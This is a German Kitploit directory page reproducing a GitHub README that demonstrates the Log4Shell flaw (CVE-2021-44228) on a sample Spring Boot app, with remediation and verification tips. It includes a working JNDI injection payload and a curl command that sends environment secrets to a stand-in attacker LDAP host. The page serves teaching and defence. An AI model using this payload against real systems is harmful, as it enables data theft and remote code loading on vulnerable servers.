Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/mazhar-hassan/log4j-vulnerability
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & Bildung
GitHubmazhar-hassan/log4j-vulnerability

log4j-vulnerability

Log4Shell (CVE-2021-44228) ist eine Zero-Day-Sicherheitslücke in Log4j

Repository anzeigen
vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Log4Shell (CVE-2021-44228) ist eine Zero-Day-Schwachstelle in Log4j

Log4J Schwachstelle

Entdeckt: 24. November 2021

Gepatcht: 6. Dezember 2021

Angriffsdemo

Klicken Sie unten für das YouTube-Video

Angriffsdemo

Beispielanwendung

Diese Beispielanwendung ist eine Spring Boot-Anwendung, verwendet Log4j als Logging-Framework und läuft mit den folgenden Umgebungsvariablen auf Port 8080 auf localhost

Schauen Sie sich die Videoerklärung an:

https://youtu.be/bb6pgWrm7tA

Umgebungsvariablen

key=jason.bourne;secret=Treadstone

Angriff

POST http://localhost:8080//v1/public/log-test

Parameter:

value=${jndi:ldap://some-random-hacking-site.com}

Angriff vom Client

Umgebungsvariablen abrufen

Mit dem folgenden String können Sie Umgebungsvariablen abrufen value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}

Curl-Befehl

curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' -i http://localhost:8080/v1/public/log-test --data 'value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}'

Log-Konsole

2021-12-25 10:47:58,112 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://some-random-hacking-site.com]. javax.naming.CommunicationException: some-random-hacking-site:389 [Root exception is java.net.ConnectException: Connection timed out: connect] at com.sun.jndi.ldap.Connection.<init>(Connection.java:243) at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137) at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)

Lösung

https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot

Bestätigung

mvn dependency:tree Stellen Sie sicher, dass keine abhängigen JARs auf eine anfällige Log4j-Version verweisen.

Techflix Youtube Sicherheits-Playlist

https://www.youtube.com/watch?v=bb6pgWrm7tA&list=PLLqjNYIgOqeQl6NaeIeUhvNcWdpOVNkRi&index=1

Tool herunterladen